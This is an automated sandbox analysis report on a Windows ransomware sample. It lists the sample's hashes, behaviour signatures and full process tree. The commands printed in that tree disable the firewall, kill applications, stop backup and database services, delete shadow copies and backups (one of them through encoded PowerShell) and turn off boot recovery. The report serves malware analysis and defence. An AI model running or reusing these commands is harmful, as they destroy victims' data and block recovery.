Analysis

  • max time kernel
    62s
  • max time network
    66s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    22/07/2020, 08:54

General

  • Target

    Deniz_K_z_.bin.exe

  • Size

    3.4MB

  • MD5

    fc78e6e58352151fb77a4b92f239d381

  • SHA1

    4dda3af9601922394f0c16713180beb2ec88c050

  • SHA256

    c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e

  • SHA512

    4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489

Malware Config

Signatures

  • UAC bypass 3 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Runs net.exe
  • Modifies service 2 TTPs 9 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Suspicious use of WriteProcessMemory 236 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • System policy modification 1 TTPs 17 IoCs
  • Kills process with taskkill 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
    1⤵
    • Checks whether UAC is enabled
    • Drops file in Drivers directory
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:824
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode disable
        3⤵
        • Modifies service
        PID:360
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:1068
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sql.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1184
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winword.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:108
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im wordpad.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im outlook.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:824
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im thunderbird.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2036
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im oracle.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1868
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im excel.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:288
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im onenote.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im virtualboxvm.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im node.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im QBW32.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1992
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im WBGX.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1888
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Teams.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1256
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Flow.*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1564
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\net.exe
        net stop DbxSvc
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop DbxSvc
          4⤵
            PID:1620
        • C:\Windows\SysWOW64\net.exe
          net stop OracleXETNSListener
          3⤵
            PID:1904
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop OracleXETNSListener
              4⤵
                PID:1916
            • C:\Windows\SysWOW64\net.exe
              net stop OracleServiceXE
              3⤵
                PID:1992
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop OracleServiceXE
                  4⤵
                    PID:1972
                • C:\Windows\SysWOW64\net.exe
                  net stop AcrSch2Svc
                  3⤵
                    PID:828
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop AcrSch2Svc
                      4⤵
                        PID:2040
                    • C:\Windows\SysWOW64\net.exe
                      net stop AcronisAgent
                      3⤵
                        PID:1492
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop AcronisAgent
                          4⤵
                            PID:1072
                        • C:\Windows\SysWOW64\net.exe
                          net stop Apache2.4
                          3⤵
                            PID:1840
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop Apache2.4
                              4⤵
                                PID:1776
                            • C:\Windows\SysWOW64\net.exe
                              net stop SQLWriter
                              3⤵
                                PID:1644
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop SQLWriter
                                  4⤵
                                    PID:1596
                                • C:\Windows\SysWOW64\net.exe
                                  net stop MSSQL$SQLEXPRESS
                                  3⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
                                      4⤵
                                        PID:1300
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop MSSQLServerADHelper100
                                      3⤵
                                        PID:1892
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                          4⤵
                                            PID:1948
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop MongoDB
                                          3⤵
                                            PID:1896
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop MongoDB
                                              4⤵
                                                PID:1964
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop SQLAgent$SQLEXPRESS
                                              3⤵
                                                PID:1080
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
                                                  4⤵
                                                    PID:1648
                                                • C:\Windows\SysWOW64\net.exe
                                                  net stop SQLBrowser
                                                  3⤵
                                                    PID:1560
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 stop SQLBrowser
                                                      4⤵
                                                        PID:1608
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net stop CobianBackup11
                                                      3⤵
                                                        PID:1576
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 stop CobianBackup11
                                                          4⤵
                                                            PID:1044
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net stop cbVSCService11
                                                          3⤵
                                                            PID:1528
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop cbVSCService11
                                                              4⤵
                                                                PID:1772
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop QBCFMontorService
                                                              3⤵
                                                                PID:1596
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop QBCFMontorService
                                                                  4⤵
                                                                    PID:1940
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net stop QBVSS
                                                                  3⤵
                                                                    PID:792
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 stop QBVSS
                                                                      4⤵
                                                                        PID:1544
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1848
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1588
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1780
                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                      vssadmin delete shadows /all /quiet
                                                                      3⤵
                                                                      • Interacts with shadow copies
                                                                      PID:1552
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      wmic shadowcopy delete
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1168
                                                                • C:\Windows\system32\vssvc.exe
                                                                  C:\Windows\system32\vssvc.exe
                                                                  1⤵
                                                                  • Modifies service
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1700

                                                                Network

                                                                MITRE ATT&CK Enterprise v6

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads